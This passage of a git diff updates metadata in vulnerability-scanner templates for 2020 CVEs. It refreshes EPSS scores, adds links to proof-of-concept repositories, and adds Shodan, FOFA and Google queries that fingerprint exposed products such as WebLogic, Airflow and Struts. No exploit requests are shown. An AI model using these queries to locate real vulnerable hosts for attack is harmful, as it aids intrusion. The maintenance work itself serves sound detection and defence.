758e2c7ab3..b476eca5c0 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: articatech product: artica_proxy + shodan-query: http.html:"artica" + fofa-query: body="artica" tags: cve,cve2020,artica,lfi,articatech http: diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 14361e187f..ba0ef6dbf0 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -14,13 +14,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - https://nvd.nist.gov/vuln/detail/CVE-2020-13167 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 - epss-score: 0.97405 - epss-percentile: 0.99917 + epss-score: 0.97432 + epss-percentile: 0.9994 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 9c8e3873f9..4400abd5e1 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.7492 + epss-percentile: 0.75413 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index b3e76eb97f..539fe48087 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.76934 - epss-percentile: 0.97935 + epss-score: 0.71681 + epss-percentile: 0.98063 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2020,cve,grafana,ssrf http: diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index cd153be8e7..1f48e0ba99 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -14,13 +14,15 @@ info: - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 + - https://github.com/merlinepedra/RHINOECURITY-CVEs + - https://github.com/mrnazu/CVE-2020-13405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 epss-score: 0.01002 - epss-percentile: 0.81964 + epss-percentile: 0.83607 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: microweber product: microweber shodan-query: http.html:"microweber" + fofa-query: body="microweber" tags: cve,cve2020,microweber,unauth,disclosure http: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 32a8729405..48c121e71d 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -21,12 +21,14 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.43845 + epss-percentile: 0.44743 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bitrix24 product: bitrix24 + shodan-query: http.html:"/bitrix/" + fofa-query: body="/bitrix/" tags: cve2020,cve,xss,bitrix,bitrix24 http: diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 041b88e439..6efcb4aba4 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.39352 - epss-percentile: 0.97152 + epss-score: 0.3523 + epss-percentile: 0.97125 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,auth-bypass,intrusive variables: username: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 01d5fcd3e6..ac464c303a 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65704 + epss-percentile: 0.68885 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: extremenetworks product: extreme_management_center shodan-query: title:"Extreme Management Center" + fofa-query: title="extreme management center" + google-query: intitle:"extreme management center" tags: cve2020,cve,xss,extremenetworks http: diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index fdaef27edb..49e673cb9c 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -25,6 +25,8 @@ info: vendor: pandorafms product: pandora_fms shodan-query: title:"Pandora FMS" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms http: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 6a9e81b8b8..11a748d533 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13927 cwe-id: CWE-1188 - epss-score: 0.96246 - epss-percentile: 0.99489 + epss-score: 0.96667 + epss-percentile: 0.99637 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 1bf59caeaf..b6066bb5c7 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: apache product: kylin + shodan-query: http.favicon.hash:-186961397 + fofa-query: icon_hash=-186961397 tags: cve,cve2020,apache http: diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 33fa34e780..b38f01fd33 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: apisix + fofa-query: title="apache apisix dashboard" + shodan-query: http.title:"apache apisix dashboard" + google-query: intitle:"apache apisix dashboard" tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix http: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 4f34dc02ce..036c2396dc 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.97181 - epss-percentile: 0.99775 + epss-score: 0.97279 + epss-percentile: 0.9986 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea Version" + fofa-query: body="powered by gitea version" + google-query: intitle:"gitea" tags: cve2020,cve,rce,gitea,authenticated,git,intrusive http: diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index bec6f00fa4..643a09d2cc 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -12,12 +12,15 @@ info: reference: - https://jira.atlassian.com/browse/JRASERVER-71536 - https://nvd.nist.gov/vuln/detail/CVE-2020-14179 + - https://github.com/developer3000S/PoC-in-GitHub + - https://github.com/hackerhackrat/R-poc + - https://github.com/soosmile/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.00927 - epss-percentile: 0.81211 + epss-score: 0.00628 + epss-percentile: 0.78972 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 42ab97f610..030185bfaa 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.95919 - epss-percentile: 0.99412 + epss-score: 0.9645 + epss-percentile: 0.99579 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 2f1c79e2ee..252fc0ba2b 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44682 + epss-percentile: 0.44743 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve2020,cve,cockpit,agentejo,xss,oss http: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 09e1f8fbdc..aacefbd84b 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.38971 + epss-percentile: 0.40142 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index fc9e6d83c2..3dff27eb2f 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -20,7 +20,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - epss-score: 0.97544 + epss-score: 0.97546 epss-percentile: 0.99996 cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: @@ -29,6 +29,8 @@ info: vendor: oracle product: fusion_middleware shodan-query: http.html:"Weblogic Application Server" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 4d4bbdc9cc..012e341c56 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: business_intelligence + shodan-query: http.title:"oracle business intelligence sign in" + fofa-query: title="oracle business intelligence sign in" + google-query: intitle:"oracle business intelligence sign in" tags: cve,cve2020,oracle,lfi,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 6e39666c78..834d6545f8 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,rce,weblogic,oast,kev http: diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index fff3e57f34..2241d75bda 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -29,6 +29,8 @@ info: vendor: oracle product: weblogic_server shodan-query: title:"Oracle PeopleSoft Sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm variables: str: "{{randstr}}" diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 08bc9bcdfe..beaf75cc9a 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: traefik product: traefik + shodan-query: http.title:"traefik" + fofa-query: title="traefik" + google-query: intitle:"traefik" tags: cve,cve2020,traefik,redirect http: diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 07a32b99f6..707a430ff8 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 - epss-score: 0.02081 - epss-percentile: 0.88831 + epss-score: 0.02822 + epss-percentile: 0.90667 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 475027a52c..5c04ab91bf 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 epss-score: 0.97285 - epss-percentile: 0.99849 + epss-percentile: 0.99862 cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index aedccf7477..424e6c8506 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -13,13 +13,15 @@ info: - https://github.com/maptiler/tileserver-gl/issues/461 - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - epss-score: 0.0021 - epss-percentile: 0.58865 + epss-score: 0.00382 + epss-percentile: 0.72931 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 7746f95cf6..e7033cf92c 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: terra-master product: tos + fofa-query: '"terramaster" && header="tos"' tags: cve2020,cve,terramaster,rce,terra-master variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 95dd9b282a..9534ddc51c 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -27,6 +27,9 @@ info: max-request: 7 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index f394848dde..949f9cbb72 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55045 + epss-percentile: 0.55848 cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-816l_firmware shodan-query: html:"DIR-816L" + fofa-query: body="dir-816l" tags: cve2020,cve,dlink,xss http: diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 52aa5efd76..d049f9e6f5 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.06015 - epss-percentile: 0.93331 + epss-score: 0.05724 + epss-percentile: 0.93341 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index a4bf4dc52a..227f3054ff 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-16846 cwe-id: CWE-78 epss-score: 0.97467 - epss-percentile: 0.99957 + epss-percentile: 0.99962 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 0bbe1a0700..3334e2b247 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.90125 - epss-percentile: 0.9872 + epss-score: 0.90937 + epss-percentile: 0.98837 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 7176d4dbdc..6712bc6cd1 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.412 + epss-percentile: 0.41606 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 6c324ce14b..4e045e955d 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.00845 - epss-percentile: 0.81776 + epss-percentile: 0.82114 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve2020,cve,xss,wso2 http: diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index b7e29cd0a0..73e1fc696f 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.96263 - epss-percentile: 0.99495 - cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + epss-score: 0.96253 + epss-percentile: 0.99525 + cpe: cpe:2.3:h:seowonintech:slc-130:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: seowonintech - product: slc-130_firmware + product: slc-130 tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 780e36249a..d6ae07a7b1 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -29,6 +29,8 @@ info: vendor: thedaylightstudio product: fuel_cms shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 146e4e4c97..a8dd10f9ed 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - epss-score: 0.97451 - epss-percentile: 0.99949 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists http: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index a4f23ab207..3267e63e23 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - epss-score: 0.96502 - epss-percentile: 0.99502 + epss-score: 0.95924 + epss-percentile: 0.99459 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 609325fb4a..4de1a02563 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -18,14 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 - epss-score: 0.97103 - epss-percentile: 0.99737 + epss-score: 0.97141 + epss-percentile: 0.99802 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: flink - tags: cve,cve2020,apache,lfi,flink + tags: cve,cve2020,apache,lfi,flink,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c5d48a8103..0c43506c12 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 - epss-score: 0.08372 - epss-percentile: 0.93787 + epss-score: 0.06442 + epss-percentile: 0.9369 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: apache product: airflow fofa-query: Apache Airflow + shodan-query: http.title:"airflow - dags" || http.html:"apache airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2020,apache,airflow,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 4c50584e0b..f18447b738 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2020,apache,rce,struts,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index ba4395254f..39a235d958 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00147 - epss-percentile: 0.49792 + epss-percentile: 0.50674 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index edb66c2da2..b2e1bb7912 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: jeesns product: jeesns + fofa-query: title="jeesns" tags: cve2020,cve,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 7349dcd02a..50c9435141 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47808 + epss-percentile: 0.48691 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns product: jeesns + fofa-query: title="jeesns" tags: cve,cve2020,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index 38fe9b6f3c..dc1cabe26e 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-19360 cwe-id: CWE-22 epss-score: 0.05104 - epss-percentile: 0.92761 + epss-percentile: 0.92929 cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 27ce751cc2..a79f2bfa25 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -20,13 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 - epss-score: 0.50879 - epss-percentile: 0.97475 + epss-score: 0.47046 + epss-percentile: 0.97448 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve2020,cve,apache,xss,ofbiz http: diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index cf7850d5de..98bffa6d05 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19515 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41242 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve2020,cve,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 55b1c1bc92..c8079f3177 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -30,6 +30,7 @@ info: vendor: apache product: kylin shodan-query: http.favicon.hash:-186961397 + fofa-query: icon_hash=-186961397 tags: cve,cve2020,apache,kylin,rce,oast,kev variables: username: "{{username}}:" diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index e7993a1d98..2796e6885d 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - 